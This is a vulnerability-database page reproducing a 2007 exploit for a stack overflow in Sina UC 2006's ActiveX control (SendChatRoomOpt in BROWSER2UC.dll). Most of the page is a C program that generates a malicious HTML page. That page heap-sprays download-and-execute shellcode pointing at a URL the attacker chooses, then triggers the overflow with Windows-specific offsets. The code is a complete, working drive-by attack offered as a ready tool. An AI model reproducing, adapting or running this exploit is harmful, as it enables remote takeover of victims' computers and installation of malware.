Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sina UC 2006 Activex SendChatRoomOpt Exploit

🗓️ 10 Jan 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 59 Views

Sina UC 2006 Activex SendChatRoomOpt Exploit by 云舒 & LuoLuo,ph4nt0morg. Remote stack overflow vulnerabilities in multiple ActiveX controls of Sina UC, allowing remote control of users' computers

Code

                                                //////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 新浪UC ActiveX多个远程栈溢出漏洞
//  
// Sowhat of  Nevis Labs
// 日期: 2007.01.09
//
// http://www.nevisnetworks.com
// http://secway.org/advisory/20070109EN.txt
// http://secway.org/advisory/20070109CN.txt
//
// CVE:    暂无
//
// 厂商
//
// Sina Inc.
//
// 受影响的版本:
// Sina UC <=UC2006
//  
// Overview:
// 新浪UC是中国非常流行的IM工具之一
//
// http://www.51uc.com
//
// 细节:
//
// 漏洞的起因是Sina UC的多个ActiveX控件的参数缺乏必要的验证,攻击者构造恶意网页,可以远程完全控制安装了Sina UC
// 的用户的计算机,
//
// 多个控件存在栈溢出问题,包括但不限于:
//
// 1. clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384
// C:\Program Files\sina\UC\ActiveX\BROWSER2UC.dll
//
// Sub SendChatRoomOpt (
//     ByVal astrVerion  As String ,
//     ByVal astrUserID  As String ,
//     ByVal asDataType  As Integer ,
//     ByVal alTypeID  As Long
// )
//
// 当第1个参数是一个超常字符串时,发生栈溢出,SEH被覆盖,攻击者可以执行任意代码
//////////////////////////////////////////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Sina UC 2006 Activex SendChatRoomOpt Exploit
// Code by 云舒 & LuoLuo,ph4nt0morg
//////////////////////////////////////////////////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <string.h>

FILE *fp = NULL;
char *file = "fuck_uc.html";
char *url = NULL;

unsigned char sc[] =    
"\x60\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x70"
"\x08\x81\xec\x00\x04\x00\x00\x8b\xec\x56\x68\x8e\x4e\x0e\xec\xe8"
"\xff\x00\x00\x00\x89\x45\x04\x56\x68\x98\xfe\x8a\x0e\xe8\xf1\x00"
"\x00\x00\x89\x45\x08\x56\x68\x25\xb0\xff\xc2\xe8\xe3\x00\x00\x00"
"\x89\x45\x0c\x56\x68\xef\xce\xe0\x60\xe8\xd5\x00\x00\x00\x89\x45"
"\x10\x56\x68\xc1\x79\xe5\xb8\xe8\xc7\x00\x00\x00\x89\x45\x14\x40"
"\x80\x38\xc3\x75\xfa\x89\x45\x18\xe9\x08\x01\x00\x00\x5e\x89\x75"
"\x24\x8b\x45\x04\x6a\x01\x59\x8b\x55\x18\x56\xe8\x8c\x00\x00\x00"
"\x50\x68\x36\x1a\x2f\x70\xe8\x98\x00\x00\x00\x89\x45\x1c\x8b\xc5"
"\x83\xc0\x50\x89\x45\x20\x68\xff\x00\x00\x00\x50\x8b\x45\x14\x6a"
"\x02\x59\x8b\x55\x18\xe8\x62\x00\x00\x00\x03\x45\x20\xc7\x00\x5c"
"\x7e\x2e\x65\xc7\x40\x04\x78\x65\x00\x00\xff\x75\x20\x8b\x45\x0c"
"\x6a\x01\x59\x8b\x55\x18\xe8\x41\x00\x00\x00\x6a\x07\x58\x03\x45"
"\x24\x33\xdb\x53\x53\xff\x75\x20\x50\x53\x8b\x45\x1c\x6a\x05\x59"
"\x8b\x55\x18\xe8\x24\x00\x00\x00\x6a\x00\xff\x75\x20\x8b\x45\x08"
"\x6a\x02\x59\x8b\x55\x18\xe8\x11\x00\x00\x00\x81\xc4\x00\x04\x00"
"\x00\x61\x81\xc4\xdc\x04\x00\x00\x5d\xc2\x24\x00\x41\x5b\x52\x03"
"\xe1\x03\xe1\x03\xe1\x03\xe1\x83\xec\x04\x5a\x53\x8b\xda\xe2\xf7"
"\x52\xff\xe0\x55\x8b\xec\x8b\x7d\x08\x8b\x5d\x0c\x56\x8b\x73\x3c"
"\x8b\x74\x1e\x78\x03\xf3\x56\x8b\x76\x20\x03\xf3\x33\xc9\x49\x41"
"\xad\x03\xc3\x56\x33\xf6\x0f\xbe\x10\x3a\xf2\x74\x08\xc1\xce\x0d"
"\x03\xf2\x40\xeb\xf1\x3b\xfe\x5e\x75\xe5\x5a\x8b\xeb\x8b\x5a\x24"
"\x03\xdd\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5"
"\x5e\x5d\xc2\x08\x00\xe8\xf3\xfe\xff\xff\x55\x52\x4c\x4d\x4f\x4e"
"\x00";

char * header =
"<!--\n"
"clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384\n"
"C:\Program Files\sina\UC\ActiveX\BROWSER2UC.dll\n\n"

"Sub SendChatRoomOpt (\n"
"    ByVal astrVerion  As String ,\n"
"    ByVal astrUserID  As String ,\n"
"    ByVal asDataType  As Integer ,\n"
"    ByVal alTypeID  As Long\n"
")\n\n"
"ph4nt0m.org, Code By 云舒 & LuoLuo\n"
"!-->\n\n"
"<html>\n"
"<head>\n"
"<script language=\"javascript\">\n"
"var heapSprayToAddress = 0x0c0c0c0c;\n"
"var shellcode = unescape(\"%u9090\"+\"%u9090\"+ \n";

char * footer =
"\n"
"var heapBlockSize = 0x100000;\n"
"var payLoadSize = shellcode.length * 2;\n"
"var spraySlideSize = heapBlockSize - (payLoadSize+0x38);\n"
"var spraySlide = unescape(\"%u9090%u9090\");\n\n"
"spraySlide = getSpraySlide(spraySlide,spraySlideSize);\n"
"heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;\n"
"memory = new Array();\n\n"
"for (i=0;i<heapBlocks;i++)\n{\n"
"\t\tmemory = spraySlide + shellcode;\n}\n"

"function getSpraySlide(spraySlide, spraySlideSize)\n{\n\t"
"while (spraySlide.length*2<spraySlideSize)\n\t"
"{\n\t\tspraySlide += spraySlide;\n\t}\n"
"\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\n\treturn spraySlide;\n}\n\n";

// print unicode shellcode
void PrintPayLoad(char *lpBuff, int buffsize)
{
    int i;
    for(i=0;i < buffsize;i+=2)
    {
        if((i%16)==0)
        {
            if(i!=0)
            {
                fprintf(fp, "%s", "\" +\n\"");
            }
            else
            {
                fprintf(fp, "%s", "\"");
            }
        }
        fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
    }
    //把shellcode打印在header后面,然后用 " ) " 闭合
    fprintf(fp, "%s", "\");\n");  
}


int main( int argc, char *argv[] )
{
    if( argc != 3 )
    {
        printf( "\nUC ActiveX object exp,Code by 云舒 & LuoLuo,ph4nt0morg\n" );
        printf( "Usage: %s   <url>   <os>\n", argv[0] );
        printf( "      1     Windows XP SP2 Chinese version,IE 6\n" );
        printf( "      2     Windows 2003 standard SP1 Chinese Version, IE 6\n" );
        
        return -1;
    }
    
    char    seh[1024] = { 0 };
    int        os = atoi( argv[2] );
    int        len = 0;
    
    if( os == 1 )
    {
        len = 3133;
    }
    else if( os == 2 )
    {
        len = 3193;
    }
    
    sprintf( seh , "var obj = new ActiveXObject(\"BROWSER2UC.BROWSERToUC\");\n\tvar arg1;\n\n<!-- Windows2003 standard SP1 + IE6 此处覆盖长度i为3193 -->\n<!-- Windows XP SP2 + IE6 此处覆盖长度i为3133 -->\n\nfor( var i = 0; i < %d; i ++ )\n{\targ1 += \"A\";\n}arg1=arg1 + unescape(\"%%0c%%0c%%0c%%0c\");\narg2=\"defaultV\";\narg3=1;\narg4=1;\nobj.SendChatRoomOpt(arg1 ,arg2 ,arg3 ,arg4);\n</script>\n</head>\n</html>", len );
    
    url = argv[1];
    if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10)
    {
        printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
        return -1;                
    }

    printf("[+] download url:%s\n", url);

    fp = fopen( file , "w" );
    if( fp == NULL )
    {
        printf( "Create file error: %d\n", GetLastError() );
        return -1;
    }
    fprintf( fp, "%s", header );
    fflush( fp );
    
    char    buffer[4096] = { 0 };
    int        sc_len = sizeof(sc)-1;
    memcpy(buffer, sc, sc_len);
    memcpy(buffer+sc_len, url, strlen(url));
  
    sc_len += strlen(url)+1;
    PrintPayLoad((char *)buffer, sc_len);
    fflush( fp );
    
    fprintf( fp, "%s", footer );
    fprintf( fp, "%s", seh );
    
    fflush( fp );
    fclose( fp );

    printf( "Create done!please look %s\n", file );
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Jan 2007 00:00Current
7.1High risk
Vulners AI Score7.1
sina ucremote controlstack overflowactivexvulnerabilityexploit云舒luoluoph4nt0morg
59